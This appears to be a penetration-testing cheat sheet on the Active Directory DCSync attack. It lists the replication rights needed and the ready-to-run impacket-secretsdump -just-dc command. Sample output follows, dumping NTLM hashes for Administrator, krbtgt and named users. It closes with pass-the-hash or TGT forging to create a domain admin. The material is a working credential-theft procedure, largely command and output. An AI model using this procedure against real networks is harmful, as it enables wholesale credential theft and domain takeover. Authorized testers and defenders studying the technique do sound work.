The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.

Important Notes about DCSync:

• The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.

• By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync

Identify Target

Identify the target user by doing some reconnaissance (p.e. with Bloodhound) and breach the account.

Exploitation

impacket-secretsdump

Use the option -just-dc to get all hashes from the DC.

impacket-secretsdump -just-dc 'Opaline.Herta:[email protected]' -outputfile dcsync_hashes
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c754b48d7d8af1e99cc89870fc90d5d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:30963dfc22c01fefcf832a0b0d4a54e8:::
domain.local\user:1103:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
domain.local\enduser:1105:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
domain.local\lu.rosanne:1107:aad3b435b51404eeaad3b435b51404ee:9726c2b6c11ed6186b6733c5558a4438:::
domain.local\gussi.annemarie:1108:aad3b435b51404eeaad3b435b51404ee:3d79ce0a6062be42e3202ad39988e48a:::
domain.local\murial.maxine:1109:aad3b435b51404eeaad3b435b51404ee:7166f21d35d02ef32ec60cb602339a56:::
domain.local\martica.liliane:1110:aad3b435b51404eeaad3b435b51404ee:1a57094cf70f74ea468f64b8429c0525:::
domain.local\cornelia.darice:1111:aad3b435b51404eeaad3b435b51404ee:fa0c75733a14990cc00cb8fdc0bc8270:::
domain.local\haley.debra:1112:aad3b435b51404eeaad3b435b51404ee:830b9f5a45fd2490ca3a529c9859d28b:::
...
[*] Cleaning up... 

-just-dc generates 3 files:

• one with the NTLM hashes
• one with the the Kerberos keys
• one with cleartext passwords from the NTDS for any accounts set with reversible encryption enabled.

Next step would be the creation of a TGT or a PtH as the Administrator user to create a user with domain administrator rights.